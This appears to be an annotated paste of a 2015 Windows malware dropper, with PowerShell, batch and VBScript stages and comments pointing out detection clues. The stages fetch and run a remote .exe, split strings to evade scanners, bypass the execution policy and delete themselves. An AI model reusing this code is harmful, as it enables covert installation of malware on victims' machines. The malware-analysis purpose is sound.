dynamoo

Malicious script

Jul 22nd, 2015
  # PowerShell stage of the sample: fetches two remote files, runs the first
  # one, then deletes the dropped stages and itself.
  # $pths, $nnm, $wehs, $ggtt and $stat are never assigned in this fragment;
  # presumably the component that assembles the template supplies them -- confirm.
  # The random-looking string assignments ($njqkwdnjkqw, $qbjwdjqwbdq, ...) are
  # never read here and look like filler.
  1. <text10>$njqkwdnjkqw='jwqdnkqwhj21kjh1j21';
  2. $qbjwdjqwbdq='1j2ehkj12h jk12hekj21 ';
  3. $down = New-Object System.Net.WebClient;
  4. $jqwdnjqkwdbj='n21jek12ehj 12hejk21 hejk';
  # Target path for the payload; the ".exe" extension is split into pieces
  # ('e'+'xe'), so a plain search for ".exe" will not match this line.
  5. $file = $pths+$nnm+'.'+'e'+'xe';
  6. $statsfile = $pths+'444.jpg';
  # Browser-like User-Agent (Safari on OS X). For defenders: this UA sent from a
  # Windows host by powershell.exe is an anomaly worth matching in proxy logs.
  7. $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  8. $dasdw='asdgjasd';
  # Two downloads: $ggtt -> $file (the .exe) and $stat -> $statsfile (444.jpg).
  9. $down.DownloadFile($ggtt,$file);
  10. $down.DownloadFile($stat,$statsfile);
  11. $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
  # $ScriptDir is assigned but not used again in this fragment.
  12. $ScriptDir = $MyInvocation.ScriptName;
  # Paths of the sibling .vbs/.bat/.ps1 stages, all derived from $pths+$wehs.
  13. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  # NOTE(review): this path is hard-coded to a "MM" user profile, unlike
  # $statsfile above. If $pths is a different directory, the clean-up below
  # misses the downloaded 444.jpg and it stays on disk as an artefact.
  14. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
  15. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  16. $psFilePath = $pths+$wehs+'.'+'ps'+'1';
  17. $asdhjqgwdq='qhwgdjqwghdjqw';
  18. $qwbhg21jd21h='jakshdjhagsdasd';
  # 13-second pause, then the downloaded file is launched through cmd.exe.
  # Process-creation telemetry would show powershell.exe -> cmd.exe /c <path>.exe.
  19. Start-Sleep -s 13;
  20. cmd.exe /c $file;
  # The gci (Get-ChildItem) results in $file1..$file3 are not used afterwards.
  21. $file1 = gci $vbsFilePath -Force
  22. $nqjwdhgjqwd='qvdhqgwjdgwq';
  23. $file2 = gci $btFilePath -Force
  24. $file3 = gci $psFilePath -Force
  25. $kasldds = $vbsFilePath
  # Clean-up: removes the .vbs, the .bat, the hard-coded 444.jpg and the .exe
  # if present. Because the stages delete themselves, an investigation should
  # not expect them on disk; process-creation and web-proxy logs are the more
  # reliable evidence.
  26. If (Test-Path $kasldds){ Remove-Item $kasldds }
  27. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  28. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  29. $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
  30. If (Test-Path $file){ Remove-Item $file }
  # Appears intended to delete the running script itself -- confirm what
  # InvocationName resolves to in the way this stage is launched.
  31. Remove-Item $MyINvocation.InvocationName</text10>
  rem Batch fragments <text20>/<text21>: assemble a ".vbs" file name from
  rem pieces and hand it to cscript.exe. Whatever belongs between the two
  rem fragments is not part of this page; %Rts4% is not set in either of them.
  rem The ping is presumably there only as a short delay -- confirm.
  32. <text20>ping 3.2.1.1 -n 2
  rem Switches the console to code page 1251 (Windows Cyrillic).
  33. chcp 1251
  rem This label is not the target of any goto in the visible fragments.
  34. :nuwqhduiw
  rem The extension is stored in three variables ("." "vb" "s"), so the literal
  rem string ".vbs" never appears in the file.
  35. set Rts2="vb"
  36. set Rts1="."
  37. set Rts3="s"</text20>
  38. <text21>:byqdyqwgjhg
  rem Runs the script named %Rts4% plus the rebuilt extension, then exits.
  rem Hunting pivot: cscript.exe started from a .bat located in a user-writable
  rem directory.
  39. cscript.exe %Rts4%%Rts1%%Rts2%%Rts3%
  40. exit</text21>
  ' VBScript fragments <text30>/<text31>: locate the script's own directory and
  ' start powershell.exe on a .ps1 file. currentFile is not assigned in either
  ' fragment; presumably it is built from currentDirectory and huih in the part
  ' that is not shown -- confirm.
  ' dff and swdff are set but not read in the visible fragments.
  41. <text30>Dim dff
  42. dff = 68
  43. swdff = 68
  ' Full script path minus the script name = the containing directory,
  ' including the trailing separator.
  44. currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
  ' objFSO is created but not used in the visible fragments.
  45. Set objFSO=CreateObject("Scripting.FileSystemObject")
  ' ".ps1" is split into two literals so it does not appear as one string.
  46. huih = ".ps"&"1"
  47. nuaaa = "powerShell.exe"</text30>
  48. <text31>Set objShell = CreateObject("Wscript.shell")
  ' Run arguments: window style 0 (hidden), wait-on-return True.
  ' The command line disables the execution-policy check and profile loading.
  ' For defenders: a script host (cscript/wscript) spawning powershell.exe with
  ' "-ExecutionPolicy bypass -noprofile -file" is a strong process-creation
  ' detection condition.
  49. objShell.Run ""&nuaaa&" -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true</text31>
  rem Batch fragments <stext1>/<stext2> (second variant on this page): run a
  rem .vbs stage, run an .exe, then delete the stages in a loop.
  rem %trfd%, %nmsj% and %exds% are not set in the visible fragments.
  rem The pings are presumably short delays -- confirm.
  50. <stext1>@echo off
  51. :wdhqgdhjg
  52. :jqwidqwdh
  53. ping 1.2.3.1 -n 2
  rem Second half of the "vbs" extension, kept apart from the ".v" literal below.
  54. set ggtt="bs"</stext1>
  rem Runs %trfd%%nmsj%.vbs through cscript.exe.
  55. <stext2>cscript.exe %trfd%%nmsj%".v"%ggtt%
  56. ping 2.2.1.1 -n 2
  57. :windows
  rem Executes %trfd%%exds%.exe directly.
  58. %trfd%%exds%".exe"
  rem Clean-up loop: deletes the .vbs, the .bat and the stat file, and repeats
  rem while either the .bat or the .vbs still exists.
  59. :loop
  60. ping 1.3.1.2 -n 1
  rem Presumably %nmsj%.bat is this batch file itself -- confirm.
  61. set tar1=%nmsj%".bat"
  rem NOTE(review): this variant names 444.png, while the PowerShell fragment on
  rem this page uses 444.jpg; the two may belong to different builds.
  62. set stat="444.png"
  63. del %trfd%%nmsj%".v"%ggtt%
  64. del %trfd%%tar1%
  65. del %trfd%%stat%
  66. if exist %trfd%%tar1% goto loop
  67. if exist %trfd%%nmsj%".vbs" goto loop
  68. exit</stext2>
  69.  
  ' VBScript fragment <stext3>: HTTP download saved to disk via ADODB.Stream.
  ' strRT, statRT and strTecation are not assigned in this fragment.
  ' Chr(80) is "P", so frgea evaluates to "MSXML2.ServerXMLHTTP"; the ProgID is
  ' split up so it does not appear as one literal.
  70. <stext3>frgea ="M"+"SX"+"ML2.ServerX"+"MLH"+"T"+"T"+Chr(80)+""
  71. Set objXMLHTTP = CreateObject(frgea)
  72. Set sFs = CreateObject(frgea)
  ' Two synchronous GET requests (third argument False = not asynchronous).
  73. objXMLHTTP.open "G"+"ET", strRT, False
  74. sFs.open "GET", statRT, False
  75. objXMLHTTP.send()
  ' The response of this second request is not read anywhere in the fragment;
  ' presumably a statistics/check-in request -- confirm.
  76. sFs.send()
  ' Only an HTTP 200 response to the first request is written to disk.
  77. If objXMLHTTP.Status = 200 Then
  78. uwqhda = "AD"&"ODB."
  79. jaisd = uwqhda
  ' Sgn(-4) is -1, so Chr(Sgn(-4)+84) is Chr(83) = "S": the ProgID resolves
  ' to "ADODB.Stream".
  80. Set objADOStream = CreateObject(jaisd+Chr(Sgn(-4)+84)+""&"tr"&"eam"&"")
  81. objADOStream.Open
  ' Type 1 = binary stream; the raw response body is written unchanged.
  82. objADOStream.Type = 1
  83. objADOStream.Write objXMLHTTP.ResponseBody
  84. objADOStream.Position = 0
  85. objADOStream.SaveToFile strTecation
  86. objADOStream.Close
  87. Set objADOStream = Nothing
  88. End if
  89. Set objXMLHTTP = Nothing
  ' Filler assignment; not read in this fragment.
  90. uhqgwduqgwd = "qihwduiqwudqwi hdqwhd"
  ' A WScript.Shell object is created here; its use is not shown.
  ' For defenders: the combination ServerXMLHTTP + ADODB.Stream.SaveToFile +
  ' WScript.Shell in one script is a common downloader pattern, but static rules
  ' must allow for the split strings used above.
  91. Set objShell = CreateObject("WScript.Shell")</stext3>